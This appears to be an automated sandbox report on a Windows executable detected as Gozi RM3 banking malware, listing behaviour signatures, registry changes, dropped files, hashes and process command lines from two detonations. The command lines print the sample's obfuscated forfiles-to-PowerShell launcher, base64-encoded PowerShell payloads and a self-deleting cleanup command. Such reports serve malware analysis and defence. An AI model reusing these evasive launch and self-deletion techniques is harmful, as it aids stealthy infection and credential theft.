Analysis Overview
SHA256
bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb
Threat Level: Known bad
The file 520636dbbdc33d8dbdf1b14f043b46f8.exe was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Deletes itself
Uses Tor communications
Drops file in System32 directory
Program crash
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-15 14:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-15 14:05
Reported
2022-03-15 14:08
Platform
win7-20220310-en
Max time kernel
4294211s
Max time network
158s
Command Line
Signatures
Gozi RM3
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Uses Tor communications
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406df82d7e38d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60815881-A471-11EC-ACC4-5A7BB634C6F6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe
"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:996356 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA842.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA91C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA91B.tmp"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\520636DBBDC33D8DBDF1B14F043B46F8.EXE"
C:\Windows\system32\timeout.exe
timeout /t 5
Network
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp
C:\Users\Admin\AppData\Local\Temp\RESA842.tmp
C:\Users\Admin\AppData\Local\Temp\osypmjrv.dll
C:\Users\Admin\AppData\Local\Temp\osypmjrv.pdb
\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.0.cs
C:\Users\Admin\AppData\Local\Temp\oza3_e8q.pdb
C:\Users\Admin\AppData\Local\Temp\oza3_e8q.dll
| MD5 | 9120556a97a45e7555ebda26a4891e04 |
| SHA1 | 8d55a8b570407ac13120a661213e3de898df0c22 |
| SHA256 | bb1dead640c14f03c904f43a2ac1520f5c8e214508ca3d70c7e7daf46b52765d |
| SHA512 | f642e1a7599a926b6c3e98b632c140f4ada33149975617470e270aeefb7d32d866aa3d80ceb290824a093a1d647ae154d97a426b767157c162b76e550629c5a4 |
memory/1912-109-0x0000000002910000-0x0000000002923000-memory.dmp
memory/1264-110-0x0000000002AD0000-0x0000000002AE5000-memory.dmp
memory/1264-633-0x0000000002640000-0x0000000002655000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-15 14:05
Reported
2022-03-15 14:08
Platform
win10v2004-20220310-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
Gozi RM3
Uses Tor communications
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1239828497" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000cb9dac30eec32464c0c795d63a23a16a1f39e144fbdfd93c39f7732b99cbf3aa000000000e800000000200002000000017dddd0f48c0769f3af9c8afc1933554d96d0346db91e42a44737c75fe3f542f20000000b48ad91c8255229396dbf7f273ecc5e0f72491b5443edf66ec76ad2da20d50c0400000000081386f7dcacf39169071cb38b5d3ab2467633e70bf52fdd268946068c8e5d7e95881abd27e51502f2dbddb2a7e47da4167b7481cc11f835870af9a6be6fb62 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000de419273ed360fc7b985f29a5666c925130999b06d43ce83f366a6852b34c23c000000000e80000000020000200000003a69eccc18e68114d24bb3f168601f93bde4d41319e870d614be2f4529f96dbbc0000000516a51845089a88aa0450be52c4741b8d4fe5a47492b1601c209c784cc85abb25db0d52fc5fc4a40b2f0de4f96cf2211375f59d7e5706acc40e648bde5bfa6045e884740a02b59e2756b3e18e1c7f36d6b99addfafeee8a5cf779ab8cec5e4fa8957317cc7ebdbef96f4c4619210e4e286fe8d267adadbfbaf7311a4c9d357a29768663975c4b54efdc42e6723246e470556b20f3390611349b5c63b5a33180ee33688c15e2ded65c56c208ce2badb2b835cdf6a33caf63abb17527705533c8e40000000d6743633e0186dd3e47a177ac2c837d302c070379995f69bc4afb7555bf5e6602da2ea75091ad7ff521d76c7f72953575edeafbc8d25105ead4ae3fbca432bc5 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000eaadc152afb50912a2244160f1e7e4d66eb78ed52dc598744cff45eeeb747b5c000000000e8000000002000020000000391f757eebed04bfc5c7b703d390a326008b043df5cee6d7f234e78d62663a5bc0000000abefa4a65af79707cccef23d3ff7ef0115f34aa2e0a454728a28bff8dd2ee5913f5e9eaab4a94228ee7de102d2dbc7430968651b763743e26c068eaf956459fa73b14b2b790718aaa6ff08eb26d0db317cbd171abc36fd5bdf1a39f037b6a3cba783a37afae48febdfbaf98546fc6fa28cc8967cf390d245c1ef36e002ee6ace3971412b8455d270f99cc92b56aff149f05c0328b3ccce2467f875a9c16bea76f573c50e12be795cc92e2f535f1febea07bb986b3c4368e84b2315a3097183d8400000008c2f29a5648fabdc1d8581408709a732679afb27f6150d526d71b30987bf779cf71de29ac114554f2c902bbc3521761b46d7129e52396d52d14a1fc0e62854b0 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6045ab4b7e38d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
